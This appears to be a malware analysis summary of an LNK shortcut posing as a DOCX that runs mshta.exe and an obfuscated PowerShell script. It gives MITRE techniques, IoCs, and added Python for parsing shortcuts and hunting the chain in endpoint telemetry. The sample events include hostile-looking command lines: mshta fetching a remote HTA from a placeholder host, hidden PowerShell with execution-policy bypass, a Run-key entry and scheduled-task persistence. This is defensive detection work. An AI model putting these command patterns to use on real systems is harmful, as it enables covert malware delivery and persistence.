A detailed analysis of a malicious LNK (Windows shortcut) file that launches mshta.exe, which in turn drops and runs an obfuscated PowerShell script to download additional malware. The analysis covers the structure of the LNK file, the payload it carries and the indicators of compromise associated with it, and stresses the value of understanding the attributes of the malicious file and the chain of steps the attacker uses to execute the plan. Affected: LNK files, mshta.exe, PowerShell
Keypoints :
- A malicious LNK file posing as a DOCX document (Explorer hides the .lnk extension, so a shortcut with a document icon passes for the document itself) executes mshta.exe.
- It drops an obfuscated PowerShell script, n.ps1, under C:\ProgramData.
- The script downloads further components from Dropbox and from the attackers' command-and-control (C2) servers.
- Persistence is established through Windows Registry modifications and Task Scheduler entries.
- Indicators of Compromise (IoCs) identified for the malware include file hashes, IP addresses and ports, and file and registry paths.
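To make the first keypoint concrete, here is an added example (written for this summary, not code from the original report) of a minimal MS-SHLLINK parser that extracts the fields a triage analyst checks on a shortcut posing as a document: the target path, its command-line arguments, the borrowed icon and the ShowCommand value. The sample .lnk it parses is constructed inside the block; its mshta.exe target and the minimised window are in the shape the report describes, while the URL (a reserved .invalid domain), the Office icon path and the file name Invoice.docx.lnk are assumptions for the example, not indicators from the report.

```python
"""Minimal MS-SHLLINK (.lnk) parser for triage: what does the shortcut launch,
with which arguments, and which icon does it borrow to look like a document?"""
import struct

# LinkCLSID 00021401-0000-0000-C000-000000000046 as it is stored on disk
SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
# LinkFlags bits (MS-SHLLINK 2.1.1) that control which optional sections follow the header
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
# StringData sections appear in exactly this order when their flag is set
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELATIVE_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGUMENTS),
                 ("icon_location", HAS_ICON_LOCATION)]
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of sight

# Binaries that run attacker-supplied script/HTML instead of the document the icon implies
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe"}
DOC_EXTENSIONS = (".docx", ".doc", ".pdf", ".xlsx", ".pptx")


def is_lnk(data: bytes) -> bool:
    """Header check: HeaderSize must be 0x4C and LinkCLSID must match."""
    return (len(data) >= 0x4C and struct.unpack_from("<I", data, 0)[0] == 0x4C
            and data[4:20] == SHELL_LINK_CLSID)


def parse_lnk(data: bytes) -> dict:
    if not is_lnk(data):
        raise ValueError("not a Shell Link file")
    flags, attrs = struct.unpack_from("<II", data, 20)
    info = {"flags": flags, "file_attributes": attrs,
            "show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:        # IDListSize (2 bytes) + IDList, skipped here
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfoSize counts itself, skipped here
        pos += struct.unpack_from("<I", data, pos)[0]
    for key, bit in STRING_FIELDS:             # CountCharacters (2 bytes) + characters, no NUL
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            raw = data[pos:pos + count * width]
            pos += count * width
            info[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return info


def triage(info: dict, filename: str) -> list:
    """Return human-readable findings for the document-lookalike pattern."""
    findings = []
    target = info.get("relative_path", "").rsplit("\\", 1)[-1].lower()
    if target in SCRIPT_HOSTS:
        findings.append(f"target is script host {target}")
    if info.get("arguments", "").lower().startswith(("http://", "https://")):
        findings.append("arguments pass a URL to the target")
    stem = filename.lower()[:-4] if filename.lower().endswith(".lnk") else filename.lower()
    if stem.endswith(DOC_EXTENSIONS):
        findings.append("double extension: Explorer hides .lnk, so it displays as a document")
    icon = info.get("icon_location", "").lower()
    if "winword" in icon or "excel" in icon or "powerpnt" in icon:
        findings.append("icon borrowed from an Office binary")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=7 minimises the window so execution is not noticed")
    return findings


def _string_data(s: str) -> bytes:
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_sample_lnk() -> bytes:
    """Constructed sample in the shape described (NOT the file from the report):
    no IDList/LinkInfo, four Unicode StringData fields, window minimised."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, SHELL_LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, SW_SHOWMINNOACTIVE, 0, 0, 0, 0)
    return header + b"".join(_string_data(s) for s in (
        "..\\..\\..\\Windows\\System32\\mshta.exe",
        "C:\\Windows\\System32",
        "https://example.invalid/stage.hta",   # placeholder URL on a reserved TLD, not an IoC
        "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"))


if __name__ == "__main__":
    info = parse_lnk(build_sample_lnk())
    for k in ("relative_path", "working_dir", "arguments", "icon_location", "show_command"):
        print(f"{k:14} {info[k]}")
    print("\n".join(triage(info, "Invoice.docx.lnk")))
```

Run it on a real sample with `parse_lnk(open(path, "rb").read())`. The parser skips the LinkTargetIDList and LinkInfo sections rather than decoding them, so a shortcut that stores its target only in the IDList (no RELATIVE_PATH string) will show no relative_path and needs a fuller parser such as LECmd or pylnk3; the arguments field, where the interesting command line usually lives, is still recovered.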
MITRE Techniques :
- Application Layer Protocol (T1071, Command and Control) – The malware connects to remote servers to retrieve additional payloads.
- Ingress Tool Transfer (T1105) – Further components are downloaded from Dropbox and the C2 servers onto the victim host.
- User Execution: Malicious File (T1204.002) – The victim opens the LNK file, which launches the commands that fetch and execute scripts from attacker-controlled sources. (T1203 is Exploitation for Client Execution and does not describe this behaviour.)
- System Binary Proxy Execution: Mshta (T1218.005) – The LNK file runs its payload through mshta.exe.
- Command and Scripting Interpreter: PowerShell (T1059.001) – The dropped n.ps1 script carries out the download stage.
- Obfuscated Files or Information (T1027) – The PowerShell script is obfuscated.
- Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) – Modifies the Windows Registry for automatic execution at system startup.
- Scheduled Task/Job: Scheduled Task (T1053.005) – Creates Task Scheduler entries to keep the malicious scripts running.
Indicators of Compromise :
- [SHA256] 563a1cfd8788542cc19db91a52b87540e9ff2512f3e78c855ffa243b0b530a5 (63 hex characters as published, one short of a full SHA256; confirm the value against the original report before using it for matching)
- [SHA256] b54fdd6e637315cb0a24a9b1ae5563cab13a48d8e26fd4ec006a11bd004efd4e
- [IP Address] 64.20.59.148:8855
- [IP Address] 64.20.59.148:6699
- [Path] C:\ProgramData\n.ps1
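As an added example (not from the original report), the following Python hunts for the chain and the persistence described above in constructed, Sysmon-style endpoint telemetry: mshta.exe launched from Explorer with a URL argument, PowerShell spawned by mshta.exe, the write of C:\ProgramData\n.ps1, a Run-key value pointing at the script, a schtasks /create, and a connection to 64.20.59.148 on port 8855 or 6699. The IoC path, IP address, ports and the complete SHA256 come from the list above; the event records, host names, command lines, registry value name, the example.invalid URL and the 192.0.2.10 address in the benign events are constructed for the example.

```python
"""Hunt the LNK -> mshta.exe -> PowerShell chain and its persistence in endpoint
telemetry. Events are constructed Sysmon-style records: event_id 1 = process
create, 11 = file create, 13 = registry value set, 3 = network connection."""
import json
from collections import defaultdict

# IoCs taken from the report (lower-cased for comparison)
IOC_PATH = r"c:\programdata\n.ps1"
IOC_IP = "64.20.59.148"
IOC_PORTS = {8855, 6699}
# Only the hash published with all 64 hex characters is matched; the other hash in the
# report has 63 characters as published and is left out until a full value is confirmed.
IOC_SHA256 = {"b54fdd6e637315cb0a24a9b1ae5563cab13a48d8e26fd4ec006a11bd004efd4e"}
RUN_KEYS = (r"\software\microsoft\windows\currentversion\run",
            r"\software\microsoft\windows\currentversion\runonce")
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

# Constructed telemetry (not from the report). WS01 shows the full chain, WS02 is benign.
# The sha256 on the file-create event stands for EDR hash enrichment of the written file.
SAMPLE_EVENTS = [
    {"host": "WS01", "event_id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" https://example.invalid/stage.hta'},
    {"host": "WS01", "event_id": 11, "image": r"C:\Windows\System32\mshta.exe",
     "target_filename": r"C:\ProgramData\n.ps1",
     "sha256": "b54fdd6e637315cb0a24a9b1ae5563cab13a48d8e26fd4ec006a11bd004efd4e"},
    {"host": "WS01", "event_id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\ProgramData\n.ps1"},
    {"host": "WS01", "event_id": 13, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_object": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"powershell.exe -WindowStyle Hidden -File C:\ProgramData\n.ps1"},
    {"host": "WS01", "event_id": 1, "image": r"C:\Windows\System32\schtasks.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'schtasks.exe /create /sc minute /mo 30 /tn Updater /tr "powershell.exe -File C:\ProgramData\n.ps1"'},
    {"host": "WS01", "event_id": 3, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest_ip": "64.20.59.148", "dest_port": 8855},
    {"host": "WS02", "event_id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": r'"C:\Windows\System32\notepad.exe" notes.txt'},
    {"host": "WS02", "event_id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_ip": "192.0.2.10", "dest_port": 443},
]


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def stage_of(e: dict):
    """Map one event to a stage of the reported chain; None when nothing matches."""
    eid = e["event_id"]
    if eid == 1:
        image, parent = _base(e["image"]), _base(e.get("parent_image", ""))
        cmd = e.get("command_line", "").lower()
        if image in SCRIPT_HOSTS and parent == "explorer.exe" and "http" in cmd:
            return "T1218.005 mshta.exe launched from Explorer with a URL argument"
        if image in ("powershell.exe", "pwsh.exe") and parent in SCRIPT_HOSTS:
            return "T1059.001 PowerShell spawned by a script host"
        if image == "schtasks.exe" and "/create" in cmd:
            return "T1053.005 scheduled task created"
    elif eid == 11:
        if e["target_filename"].lower() == IOC_PATH or e.get("sha256", "").lower() in IOC_SHA256:
            return "IoC file written: n.ps1 path or known SHA256"
    elif eid == 13:
        key, details = e["target_object"].lower(), e.get("details", "").lower()
        if any(run in key for run in RUN_KEYS) and ("powershell" in details or ".ps1" in details):
            return "T1547.001 Run key value points at a PowerShell script"
    elif eid == 3:
        if e["dest_ip"] == IOC_IP and int(e["dest_port"]) in IOC_PORTS:
            return f"C2 connection to IoC address {IOC_IP}:{e['dest_port']}"
    return None


def hunt(events) -> dict:
    """Group matched stages by host, preserving event order."""
    hits = defaultdict(list)
    for e in events:
        stage = stage_of(e)
        if stage:
            hits[e["host"]].append(stage)
    return dict(hits)


def verdict(stages) -> str:
    """Three or more distinct stages on one host is treated as the full chain."""
    n = len(set(stages))
    return "confirmed chain" if n >= 3 else "suspicious" if n else "clean"


if __name__ == "__main__":
    for host, stages in hunt(SAMPLE_EVENTS).items():
        print(json.dumps({"host": host, "verdict": verdict(stages), "stages": stages}, indent=2))
```

The per-host correlation is what makes this more than an IoC grep: a single Run-key write or one PowerShell child of mshta.exe is only "suspicious", but several stages on the same host in sequence is the pattern the report describes and can be escalated directly. Feed real events by mapping your EDR's field names onto the keys used here.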